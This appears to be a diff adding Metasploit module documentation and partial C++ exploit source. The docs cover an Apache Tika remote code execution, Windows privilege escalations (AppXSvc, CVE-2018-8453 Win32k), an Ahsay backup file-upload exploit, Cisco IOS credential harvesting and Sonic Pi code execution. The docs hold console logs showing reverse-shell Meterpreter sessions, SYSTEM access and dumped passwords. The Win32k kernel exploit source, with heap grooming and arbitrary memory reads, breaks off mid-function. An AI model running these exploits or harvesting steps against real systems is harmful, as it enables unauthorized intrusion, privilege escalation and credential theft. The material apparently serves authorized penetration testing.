+  Rhino Security Labs has an Excellent write-up describing this vulnerability.  Find it on
+  [rhinosecuritylabs.com](https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/) or
+  [wayback](https://web.archive.org/web/20190314101650/https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/).
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploits/windows/http/apache_tika_jp2_jscript```
+  4. Do: ```run```
+  5. You should get a shell.
+
+## Scenarios
+
+### 1.17 on Windows 2012 running as Administrator
+
+```
+resource (tika.rb)> use exploits/windows/http/apache_tika_jp2_jscript
+resource (tika.rb)> set rhost 2.2.2.2
+rhost => 2.2.2.2
+resource (tika.rb)> set verbose true
+verbose => true
+resource (tika.rb)> check
+[*] Apache Tika Version Detected: 1.17
+[+] 2.2.2.2:9998 - The target is vulnerable.
+resource (tika.rb)> run
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Powershell command length: 2278
+[*] Sending PUT request to 2.2.2.2:9998/meta
+[*] Sending stage (179779 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49313) at 2019-03-28 21:33:09 -0400
+
+meterpreter > getuid
+Server username: WIN-OBKF2JFCDKL\Administrator
+meterpreter > getpid
+Current pid: 1552
+meterpreter > sysinfo
+Computer        : WIN-OBKF2JFCDKL
+OS              : Windows 2012 (Build 9200).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+```
@@ -0,0 +1,72 @@
+## Description
+
+  There exists a privilege escalation vulnerability for Windows 10 builds prior to build 17763.
+  Due to the AppXSvc's improper handling of hard links, a user can gain full privileges over
+  a SYSTEM-owned file. The user can then utilize the new file to execute code as SYSTEM.
+
+  This module leverages a technique discovered by James Forshaw to enable loading and execution
+  of a dll with SYSTEM privileges.
+
+## Vulnerable Application
+
+  Windows 10 builds prior to 17763. Windows 10 is available for download [here](https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/).
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a low-privileged session
+  3. Do: ```use exploit/windows/local/appxsvc_hard_link_privesc```
+  4. Do: ```set SESSION <session>```
+  5. Do: ```set PAYLOAD <payload>```
+  6. Do: ```set LHOST <ip>```
+  7. Do: ```run```
+  8. You should get a shell running as SYSTEM
+
+## Scenarios
+
+### Tested on Windows 10 Version 1709 Build 16299.125
+
+  ```
+  msf5 > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (206403 bytes) to 192.168.37.135
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.135:49985) at 2019-07-08 12:01:09 -0500
+
+  meterpreter > getuid
+  Server username: DESKTOP-L5FDSM7\Shelby Pace
+  meterpreter > background
+  [*] Backgrounding session 1...
+  msf5 exploit(multi/handler) > use exploit/windows/local/appxsvc_hard_link_privesc
+  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [+] Successfully created hard link
+  [*] Attempting to launch Microsoft Edge minimized.
+  [*] Writing the payload to disk
+  [*] Sending stage (206403 bytes) to 192.168.37.135
+  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.135:49986) at 2019-07-08 12:02:02 -0500
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : DESKTOP-L5FDSM7
+  OS              : Windows 10 (Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  ```
@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
+
+This module has been tested with Windows 10 v1703 x86. Offsets within the solution may need to be adjusted to work with other version of Windows.
+
+## Verification Steps
+
+1. Get a non-SYSTEM meterpreter session on Win10 v1703 x86
+2. `use exploit/windows/local/cve_2018_8453_win32k_priv_esc`
+3. `set session <session>`
+4. `exploit`
+5. Get a SYSTEM session
+
+## Scenarios
+
+### Windows 10 v1703 x86
+
+```
+msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                 Connection
+  --  ----  ----                     -----------                                 ----------
+  1         meterpreter x86/windows  DESKTOP-T6J3V2L\testuser @ DESKTOP-T6J3V2L  172.22.222.136:4444 -> 172.22.222.130:49693 (172.22.222.130)
+
+msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > set session 1
+session => 1
+msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[+] Exploit finished, wait for privileged payload execution to complete.
+[*] Sending stage (179779 bytes) to 172.22.222.130
+[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.130:49695) at 2019-06-20 08:53:01 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-T6J3V2L
+OS              : Windows 10 (Build 15063).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x86/windows
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.22.222.130 - Meterpreter session 2 closed.  Reason: User exit
+msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > 
+```
@@ -0,0 +1,57 @@
+## Vulnerable Application
+  Ahsay Backup v7.x - v8.1.1.50
+  Download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
+  Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)
+  
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/windows/misc/ahsay_fileupload`
+  3. enable create trial account `set CREATEACCOUNT true`
+  4. set RHOST `set RHOST 172.16.238.175` 
+  5. set LHOST `set LHOST 172.16.238.235`
+  6. run exploit `run`
+  7. We should receive a meterpreter shell.
+
+## Options
+
+   CREATEACCOUNT  - Create a Trial account, use this when trial accounts is enabled and you do not have a valid credentials.
+   PASSWORD       - Password to Ahsay useraccount, if CREATEACCOUNT is set this password will be used.
+   RHOST          - Target address.
+   RPORT          - The target port (TCP).
+   TARGETURI      - Path to Ahsay installation
+   UPLOADPATH     - Path to where the file should be uploaded
+   USERNAME       - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.
+   
+## Scenarios
+
+### Version of software and OS as applicable
+
+This exploit has been tested on Windows 2003 SP2.
+
+  ```
+msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
+CREATEACCOUNT => true
+msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
+RHOST => 172.16.238.175
+msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
+LHOST => 172.16.238.235
+msf exploit(windows/misc/ahsay_fileupload) > run
+
+[*] Started reverse TCP handler on 172.16.238.235:4444 
+[+] Username and password are valid!
+[+] No need to create account, already exists!
+[*] Uploading payload
+[+] Succesfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
+[*] Uploading payload
+[+] Succesfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
+[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
+[+] Exploit executed!
+[*] Sending stage (179779 bytes) to 172.16.238.175
+[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
+[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
+[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target
+
+meterpreter > getuid
+Server username: AHSAY-123\Administrator
+  ```
@@ -0,0 +1,171 @@
+## Vulnerable Application
+
+  This module has been tested on the following hardware/OS combinations.
+
+  * IOS
+    * Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13
+    * UC520, UC520-8U-4FXO-K9, Version 12.4(20)T2
+
+  The Catalyst 2950 config can be found [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/cisco-2950.config)
+
+  The UC520 config can be found [here](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/cisco-uc520.config)
+
+  This module will look for the follow parameters which contain credentials:
+
+  * IOS
+    * enable
+    * snmp-server
+    * VTY
+    * WiFi
+    * VPN
+    * username
+    * PPP
+    * web admin
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a shell
+  3. Do: ```use post/cisco/gather/enum_cisco```
+  4. Do: ```set session [id]```
+  5. Do: ```set verbose true```
+  6. Do: ```run```
+
+## Scenarios
+
+### Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13
+
+```
+resource (cisco.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (cisco.rb)> set username cisco
+username => cisco
+resource (cisco.rb)> set password cisco
+password => cisco
+resource (cisco.rb)> set rhosts 222.222.2.222
+rhosts => 222.222.2.222
+resource (cisco.rb)> run
+[+] 222.222.2.222:22 - Success: 'cisco:cisco' ''
+[*] Command shell session 1 opened (111.111.1.111:40721 -> 222.222.2.222:22) at 2019-07-20 16:29:05 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (cisco.rb)> use post/cisco/gather/enum_cisco
+resource (cisco.rb)> set session 1
+session => 1
+resource (cisco.rb)> set verbose true
+verbose => true
+resource (cisco.rb)> set enable enable
+enable => enable
+resource (cisco.rb)> run
+[!] SESSION may not be compatible with this module.
+[*] Getting version information
+[*] Getting privilege level
+[*] The device OS is IOS
+[*] Session running in mode EXEC
+[*] Privilege level 1
+[+] version information stored in to loot, file:/root/.msf4/loot/20190720162921_default_222.222.2.222_cisco.ios.versio_081759.txt
+[*] Gathering info from show ip interface brief
+[+] Saving to /root/.msf4/loot/20190720162941_default_222.222.2.222_cisco.ios.interf_908844.txt
+[*] Gathering info from show inventory
+[+] Saving to /root/.msf4/loot/20190720162946_default_222.222.2.222_cisco.ios.hw_inv_152516.txt
+[+] Obtained higher privilege level.
+[*] Gathering info from show run
+[*] Parsing running configuration for credentials and secrets...
+[+] 222.222.2.222:22 MD5 Encrypted Enable Password: $1$crRb$AJAfWfnDJ6Kf83o.P4RxU0
+[+] 222.222.2.222:22 Decrypted Enable Password: password
+[+] 222.222.2.222:22 Username 'encrypted' with Decrypted Password: encrypted
+[+] 222.222.2.222:22 Username 'admin' with Password: admin
+[+] 222.222.2.222:22 Username 'cisco' with Password: cisco
+[+] 222.222.2.222:22 Unencrypted VTY Password: password
+[+] 222.222.2.222:22 Decrypted VTY Password: password
+[+] Saving to /root/.msf4/loot/20190720163001_default_222.222.2.222_cisco.ios.run_co_537064.txt
+[*] Gathering info from show cdp neigh
+[+] Saving to /root/.msf4/loot/20190720163006_default_222.222.2.222_cisco.ios.cdp_ne_989308.txt
+[*] Post module execution completed
+[*] Starting persistent handler(s)...
+msf5 post(cisco/gather/enum_cisco) > creds
+Credentials
+===========
+
+host           origin         service  public     private                         realm  private_type        JtR Format
+----           ------         -------  ------     -------                         -----  ------------        ----------
+222.222.2.222  222.222.2.222  22/tcp   cisco      cisco                                  Password            
+222.222.2.222  222.222.2.222  22/tcp              $1$crRb$AJAfWfnDJ6Kf83o.P4RxU0         Nonreplayable hash  md5
+222.222.2.222  222.222.2.222  22/tcp              password                               Password            
+222.222.2.222  222.222.2.222  22/tcp   encrypted  encrypted                              Password            
+222.222.2.222  222.222.2.222  22/tcp   admin      admin                                  Password            
+```
+
+### UC520, UC520-8U-4FXO-K9, Version 12.4(20)T2
+
+```
+[*] Processing cisco.rb for ERB directives.
+resource (cisco.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (cisco.rb)> set username cisco
+username => cisco
+resource (cisco.rb)> set password cisco
+password => cisco
+resource (cisco.rb)> set rhosts 222.222.2.222
+rhosts => 222.222.2.222
+resource (cisco.rb)> run
+[+] 222.222.2.222:22 - Success: 'cisco:cisco' ''
+[*] Command shell session 1 opened (111.111.1.111:41839 -> 222.222.2.222:22) at 2019-07-21 16:24:02 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (cisco.rb)> use post/cisco/gather/enum_cisco
+resource (cisco.rb)> set session 1
+session => 1
+resource (cisco.rb)> set verbose true
+verbose => true
+resource (cisco.rb)> set enable cisco
+enable => cisco
+resource (cisco.rb)> run
+[!] SESSION may not be compatible with this module.
+[*] Getting version information
+[*] Getting privilege level
+[*] The device OS is IOS
+[*] Session running in mode EXEC
+[*] Privilege level 1
+[+] version information stored in to loot, file:/root/.msf4/loot/20190721162417_default_222.222.2.222_cisco.ios.versio_707957.txt
+[*] Gathering info from show login
+[+] Saving to /root/.msf4/loot/20190721162432_default_222.222.2.222_cisco.ios.login__534767.txt
+[*] Gathering info from show ip interface brief
+[+] Saving to /root/.msf4/loot/20190721162437_default_222.222.2.222_cisco.ios.interf_310865.txt
+[*] Gathering info from show inventory
+[+] Saving to /root/.msf4/loot/20190721162443_default_222.222.2.222_cisco.ios.hw_inv_238952.txt
+[+] Obtained higher privilege level.
+[*] Gathering info from show run
+[*] Parsing running configuration for credentials and secrets...
+[+] 222.222.2.222:22 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
+[+] 222.222.2.222:22 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
+[+] 222.222.2.222:22 SNMP Community (RO): public
+[+] 222.222.2.222:22 SNMP Community (RW): private
+[+] 222.222.2.222:22 Website Username: cisco, of type: system, Password Hash: $1$n/n0$q6wNrBypu0GDpxzfSwGnf1
+[+] 222.222.2.222:22 ePhone Username 'phoneone' with Password: 111111
+[+] 222.222.2.222:22 ePhone Username 'phonetwo' with Password: 222222
+[+] 222.222.2.222:22 ePhone Username 'phonethree' with Password: 333333
+[+] 222.222.2.222:22 ePhone Username 'phonefour' with Password: 444444
+[+] Saving to /root/.msf4/loot/20190721162458_default_222.222.2.222_cisco.ios.run_co_918487.txt
+[*] Gathering info from show cdp neigh
+[+] Saving to /root/.msf4/loot/20190721162503_default_222.222.2.222_cisco.ios.cdp_ne_135156.txt
+[*] Gathering info from show lldp neigh
+[+] Saving to /root/.msf4/loot/20190721162508_default_222.222.2.222_cisco.ios.cdp_ne_405367.txt
+[*] Post module execution completed
+[*] Starting persistent handler(s)...
+msf5 post(cisco/gather/enum_cisco) > creds
+Credentials
+===========
+
+host           origin         service  public      private                         realm  private_type        JtR Format
+----           ------         -------  ------      -------                         -----  ------------        ----------
+222.222.2.222  222.222.2.222  22/tcp   cisco       $1$n/n0$q6wNrBypu0GDpxzfSwGnf1         Nonreplayable hash  md5
+222.222.2.222  222.222.2.222  22/tcp   cisco       $1$DaqN$iP32E5WcOOui/H66R63QB0         Nonreplayable hash  md5
+222.222.2.222  222.222.2.222  22/tcp   cisco       cisco                                  Password            
+222.222.2.222  222.222.2.222  22/tcp   phoneone    111111                                 Password            
+222.222.2.222  222.222.2.222  22/tcp   phonetwo    222222                                 Password            
+222.222.2.222  222.222.2.222  22/tcp   phonethree  333333                                 Password            
+222.222.2.222  222.222.2.222  22/tcp   phonefour   444444                                 Password            
+222.222.2.222  222.222.2.222  161/udp              private                                Password            
+222.222.2.222  222.222.2.222  161/udp              public                                 Password            
+222.222.2.222  222.222.2.222  22/tcp               $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1         Nonreplayable hash  md5
+```
+
@@ -0,0 +1,115 @@
+## Intro
+
+This module controls Sonic Pi via its local OSC server.
+
+The server runs on `127.0.0.1:4557` and receives OSC messages over UDP.
+
+## Setup
+
+I've supported only OS X. I had no luck running Sonic Pi on Windows, and
+I can't test Raspberry Pi at the moment.
+
+`brew cask install sonic-pi` if you have Homebrew or download and
+install Sonic Pi from <https://sonic-pi.net/#mac>.
+
+## Actions
+
+```
+Name  Description
+----  -----------
+Run   Run Sonic Pi code
+Stop  Stop all jobs
+```
+
+## Options
+
+**OSC_HOST**
+
+This is the OSC server host, which is `127.0.0.1` by default.
+
+**OSC_PORT**
+
+This is the OSC server (UDP) port, which is `4557` by default.
+
+**START_SONIC_PI**
+
+Enable this to start Sonic Pi if it isn't running already. Note that
+this will start the GUI, which will be visible to the user.
+
+**FILE**
+
+This is the path to Sonic Pi code you want to run. It can be arbitrary
+Ruby.
+
+**SonicPiPath**
+
+This is the path to the Sonic Pi executable within its application
+bundle.
+
+**RubyPath**
+
+This is the path to a Ruby executable. Sonic Pi's vendored Ruby is the
+default.
+
+## Usage
+
+```
+msf5 post(osx/manage/sonic_pi) > options
+
+Module options (post/osx/manage/sonic_pi):
+
+   Name            Current Setting                                             Required  Description
+   ----            ---------------                                             --------  -----------
+   FILE            /rapid7/metasploit-framework/data/post/sonic_pi_example.rb  yes       Path to Sonic Pi code
+   OSC_HOST        127.0.0.1                                                   yes       OSC server host
+   OSC_PORT        4557                                                        yes       OSC server port
+   SESSION                                                                     yes       The session to run this module on.
+   START_SONIC_PI  false                                                       yes       Start Sonic Pi
+
+
+Post action:
+
+   Name  Description
+   ----  -----------
+   Run   Run Sonic Pi code
+
+
+msf5 post(osx/manage/sonic_pi) > advanced
+
+Module advanced options (post/osx/manage/sonic_pi):
+
+   Name         Current Setting                                         Required  Description
+   ----         ---------------                                         --------  -----------
+   RubyPath     /Applications/Sonic Pi.app/server/native/ruby/bin/ruby  yes       Path to Ruby executable
+   SonicPiPath  /Applications/Sonic Pi.app/Contents/MacOS/Sonic Pi      yes       Path to Sonic Pi executable
+   VERBOSE      true                                                    no        Enable detailed status messages
+   WORKSPACE                                                            no        Specify the workspace for this module
+
+msf5 post(osx/manage/sonic_pi) > show actions
+
+Post actions:
+
+   Name  Description
+   ----  -----------
+   Run   Run Sonic Pi code
+   Stop  Stop all jobs
+
+
+msf5 post(osx/manage/sonic_pi) > set session -1
+session => -1
+msf5 post(osx/manage/sonic_pi) > run
+
+[+] Sonic Pi is running
+[*] Running Sonic Pi code: /rapid7/metasploit-framework/data/post/sonic_pi_example.rb
+[*] echo [snip] | base64 -D | /Applications/Sonic\ Pi.app/server/native/ruby/bin/ruby
+[*] Post module execution completed
+msf5 post(osx/manage/sonic_pi) > set action Stop
+action => Stop
+msf5 post(osx/manage/sonic_pi) > run
+
+[+] Sonic Pi is running
+[*] Stopping all jobs
+[*] echo [snip] | base64 -D | /Applications/Sonic\ Pi.app/server/native/ruby/bin/ruby
+[*] Post module execution completed
+msf5 post(osx/manage/sonic_pi) >
+```
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 2013 for Windows Desktop
+VisualStudioVersion = 12.0.40629.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2018-8453", "CVE-2018-8453\CVE-2018-8453.vcxproj", "{B175079F-C017-4DF1-889A-63417E1E0EDF}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{B175079F-C017-4DF1-889A-63417E1E0EDF}.Debug|Win32.ActiveCfg = Debug|Win32
+		{B175079F-C017-4DF1-889A-63417E1E0EDF}.Debug|Win32.Build.0 = Debug|Win32
+		{B175079F-C017-4DF1-889A-63417E1E0EDF}.Release|Win32.ActiveCfg = Release|Win32
+		{B175079F-C017-4DF1-889A-63417E1E0EDF}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,429 @@
+// CVE-2018-8453.cpp : Defines the entry point for the console application.
+//
+
+#include "stdio.h"
+#include "stdafx.h"
+#include "windows.h"
+#include "psapi.h"
+#include "wchar.h"
+
+BOOL			bMSGSENT = FALSE;
+HWND			hMainWND;
+HWND			hSBWND;
+HWND			hSBWNDnew;
+DWORD			SystemCallStub;
+CHAR			flag[0x80] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ze0r is so cool!";
+
+HPALETTE		hManager;
+HPALETTE		hWorker;
+HPALETTE		hKeep;
+HDC				hKeepDC = NULL;
+PDWORD			CallbackTb = 0;
+LPACCEL			lpAccel;
+
+typedef VOID(WINAPI * fct_fnDispatch)(PDWORD msg);
+
+fct_fnDispatch	fnDWORD;
+fct_fnDispatch  fnClientFreeWindowClassExtraBytes;
+
+typedef struct
+{
+	DWORD UniqueProcessIdOffset;
+	DWORD TokenOffset;
+} VersionSpecificConfig;
+
+//VersionSpecificConfig gConfig = { 0xb4, 0xfc }; // Win 10 15063 rs2 x86
+VersionSpecificConfig gConfig = { 0x0, 0x0 }; // Win 10 15063 rs2 x86
+
+LRESULT CALLBACK    WndProc(HWND, UINT, WPARAM, LPARAM);
+INT_PTR CALLBACK    About(HWND, UINT, WPARAM, LPARAM);
+
+void SetWindowFNID(HWND hWnd, DWORD FNID) {
+	__asm {
+		mov		esi, esi;
+		mov		eax, hWnd;
+		push	FNID;
+		push	eax;
+		push	0;
+		mov		eax, 0x1202;
+		mov		edx, SystemCallStub;
+		call	edx;
+		add		esp, 0x0c;
+	}
+}
+
+int SetLinkedUFIs(HDC hdc, int len) {
+	int retvalue;
+	__asm {
+		push	len;
+		lea     eax, flag;
+		PUSH	eax;
+		push	hdc;
+		push	0;
+		mov		eax, 0x1023;
+		mov		edx, SystemCallStub;
+		call	edx;
+		add		esp, 0x10;
+		mov		retvalue, eax;
+	}
+	return retvalue;
+}
+
+DWORD buf[0x240];
+
+void ReadMem(DWORD Addr, DWORD len) {
+	memset(buf, 0, 0x240 * 4);
+	GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+	buf[19] = Addr;
+	SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+	GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)buf);
+}
+
+ULONG GetNTOsBase()
+{
+	ULONG Bases[0x1000];
+	DWORD needed = 0;
+	ULONG krnlbase = 0;
+	if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+		krnlbase = Bases[0];
+	}
+	return krnlbase;
+}
+
+DWORD_PTR PsInitialSystemProcess(VOID)
+{
+	ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+	ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+	FreeLibrary((HMODULE)Module);
+	ULONG res = 0;
+	ULONG ntOsBase = GetNTOsBase();
+	if (ntOsBase) {
+		ReadMem(Addr - Module + ntOsBase, 16);
+		res = buf[0];
+	}
+	return res;
+}
+
+ULONG PsGetCurrentProcess(DWORD sysEPS)
+{
+	ULONG pEPROCESS = sysEPS;
+	ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG), 16);
+	while (TRUE) {
+		pEPROCESS = buf[1] - gConfig.UniqueProcessIdOffset - sizeof(ULONG);
+		ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 16);
+		if (GetCurrentProcessId() == buf[0]) {
+			return pEPROCESS;
+		}
+	}
+}
+
+DWORD_PTR GetKernelHandleTable(VOID)
+{
+	ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+	ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "KeServiceDescriptorTable");
+	FreeLibrary((HMODULE)Module);
+	ULONG res = 0;
+	ULONG DestroyAcceleratorTableAddr = 0;
+	ULONG HMValidateHandleAddr = 0;
+	ULONG ntOsBase = GetNTOsBase();
+	if (ntOsBase) {
+		ReadMem(Addr - Module + ntOsBase - 0x40, 16 * 6);
+		ReadMem(buf[4] + 0x500, 16);
+		ReadMem(buf[0] + 2, 16);
+		ReadMem(buf[0], 16);
+		DestroyAcceleratorTableAddr = buf[0] + 0x18;
+		ReadMem(DestroyAcceleratorTableAddr, 16);
+		HMValidateHandleAddr = DestroyAcceleratorTableAddr + buf[0] + 4 + 0x39;
+		ReadMem(HMValidateHandleAddr, 16);
+		ReadMem(buf[0], 16);
+		ReadMem(buf[0], 16);
+		res = buf[0];
+	}
+	return res;
+}
+
+HPALETTE CreatePaletteOfSize(int size, DWORD value) {
+	int pal_cnt = (size - 0x60) / 4;
+	int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+	LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+	memset(lPalette, value, palsize);
+	lPalette->palNumEntries = pal_cnt;
+	lPalette->palVersion = 0x300;
+	return CreatePalette(lPalette);
+}
+
+
+HACCEL			hAccel_0xC10_top[2000];
+HACCEL			hAccel_0x50_middle[3000];
+HACCEL			hAccel_0x3B0_bottom[2000];
+HACCEL			hAccel_ReusePalette[8000];
+HDC				hDC_Writer[3000];
+HPALETTE		hPalettes[10000];
+
+void BeforSBTrackAlloc() {
+
+	for (int i = 0; i < 3000; i++) {
+		hDC_Writer[i] = CreateCompatibleDC(NULL);
+	}
+
+	for (int i = 0; i < 2000; i++) {
+		hAccel_0xC10_top[i] = CreateAcceleratorTableW(lpAccel, 0x1FD);
+	}
+
+	for (int i = 0; i < 2000; i++) {
+		hAccel_0x3B0_bottom[i] = CreateAcceleratorTableW(lpAccel, 0x95);
+	}
+
+	for (int i = 0; i < 3000; i++) {
+		hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 8);
+	}
+	for (int i = 1000; i < 3000; i += 2) {
+		DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+	}
+}
+
+void _cdecl AfterSBTrackAlloc() {
+	for (int i = 0; i < 3000; i++) {
+		DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+	}
+	SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+	for (int i = 0; i < 2000; i++) {
+		DestroyAcceleratorTable(hAccel_0x3B0_bottom[i]);
+	}
+
+	for (int i = 0; i < 3000; i++) {
+		SetLinkedUFIs(hDC_Writer[i], 0x7D);
+	}
+}
+
+void FindManagerAndWorker() {
+
+	for (int i = 0; i < 2000; i++) {
+		DestroyAcceleratorTable(hAccel_0xC10_top[i]);
+	}
+	for (int i = 0; i < 3000; i++) {
+		hPalettes[i] = CreatePaletteOfSize(0xb30, 0x66);
+	}
+	for (int i = 0; i < 2000; i++) {
+		hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 0x26);
+	}
+	for (int i = 3000; i < 10000; i++) {
+		hPalettes[i] = CreatePaletteOfSize(0x100, 0x88);
+	}
+
+	*((DWORD *)flag) = 0x501;
+	*((DWORD *)flag + 1) = 0xFFFF;
+	for (int i = 0; i < 3000; i++) {
+		SetLinkedUFIs(hDC_Writer[i], 1);
+	}
+	memset(buf, 0, 0x240 * 4);
+	for (int i = 3000; i < 10000; i++) {
+		if (GetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf)) {
+			hKeep = hPalettes[i];
+			hManager = (HPALETTE)*buf;
+			hWorker = (HPALETTE)*(buf + 64);
+			*(buf + 5) = 0xFFFF;
+			*(buf + 69) = 0xFFFF;
+			SetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf);
+		}
+	}
+
+	*((DWORD *)flag) = 0x501;
+	*((DWORD *)flag + 1) = 0x28;
+	for (int i = 0; i < 3000; i++) {
+		SetLinkedUFIs(hDC_Writer[i], 1);
+		if (!hKeepDC && (!GetPaletteEntries(hKeep, 0x2B, 80, (LPPALETTEENTRY)buf))) {
+			hKeepDC = hDC_Writer[i];
+		}
+	}
+}
+
+void GetSystem(wchar_t* cmd) {
+
+	ULONG	SelfToken = 0;
+	ULONG	SystemToken = 0;
+	DWORD	ACCELHandle = 0;
+	DWORD	SystemEPS;
+	DWORD	CurrentEPS;
+	DWORD	pKernelHandleTable;
+
+	STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+	PROCESS_INFORMATION pProcessInfo;
+	//WCHAR	cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+	//printf("[*] Find Manager and Worker.\n");
+	FindManagerAndWorker();
+	SystemEPS = PsInitialSystemProcess();
+	CurrentEPS = PsGetCurrentProcess(SystemEPS);
+	pKernelHandleTable = GetKernelHandleTable();
+
+	ReadMem(SystemEPS + gConfig.TokenOffset, 16);
+	SystemToken = buf[0];
+	GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
